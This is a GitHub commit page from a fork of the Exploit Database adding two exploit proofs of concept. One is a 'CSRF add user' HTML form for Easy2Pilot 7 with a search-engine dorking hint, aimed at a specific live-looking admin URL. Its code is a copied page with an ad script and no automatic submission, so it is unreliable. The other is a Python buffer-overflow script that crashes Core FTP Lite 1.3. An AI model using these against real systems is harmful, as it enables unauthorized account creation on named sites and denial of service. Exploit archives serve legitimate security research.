forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
2 changes to exploits/shellcodes Core FTP Lite 1.3 - Denial of Service (PoC) Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
- Loading branch information
Offensive Security
committed
Feb 21, 2020
1 parent
16b4553
commit ed6caf0
Showing
3 changed files
with
78 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User) | ||
# Author: indoushka | ||
# Date: 2020-02-20 | ||
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | ||
# Vendor: http://easy2pilot-v7.com/ | ||
# CVE: N/A | ||
|
||
#poc : | ||
|
||
[+] Dorking İn Google Or Other Search Enggine. | ||
|
||
[+] save code as poc.html | ||
|
||
[+] | ||
|
||
<!DOCTYPE html> | ||
<html xmlns="http://www.w3.org/1999/xhtml"> | ||
<head profile="http://www.w3.org/2005/10/profile"> | ||
<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> | ||
</tr> | ||
</table> | ||
<br/><br/> | ||
<form action="https://immosl.lu/admin.php?action=add_user" method="POST"> | ||
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350"> | ||
<tr> | ||
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td> | ||
</tr> | ||
<tr> | ||
<td class="tah11" align="right">Nom d'utilisateur :</td> | ||
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td> | ||
</tr> | ||
<tr> | ||
<td class="tah11" align="right">Mot de passe : </td> | ||
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td> | ||
</tr> | ||
<tr> | ||
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td> | ||
</tr> | ||
</table> | ||
</form><br/><br/> | ||
<div> | ||
|
||
|
||
Greetings to :========================================================================================================================= | ||
| | ||
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ||
| | ||
======================================================================================================================================= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC) | ||
# Exploit Author: Berat Isler | ||
# Date: 2020-02-20 | ||
# Vendor Homepage: http://www.coreftp.com/ | ||
# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437 | ||
# Version: Core FTP 1.3cBuild1437 | ||
# Tested on : Windows 7 32-bit | ||
|
||
# First step , Run exploit script, it will generate a new file with the name "mi.txt" | ||
# Then start Core FTP application and find the "username" textbox. | ||
# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA" | ||
# Don't need to click anything because application is already crash. | ||
|
||
This is the code : | ||
|
||
|
||
#!/usr/bin/python | ||
|
||
b0f = "A" * 7000 | ||
payload = b0f | ||
try: | ||
f=open("mi.txt","w") | ||
print "[+] Creating %s bytes payload generated .. .. .." %len(payload) | ||
f.write(payload) | ||
f.close() | ||
print "[+] File created :) " | ||
except: | ||
print "File cannot be created :((" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters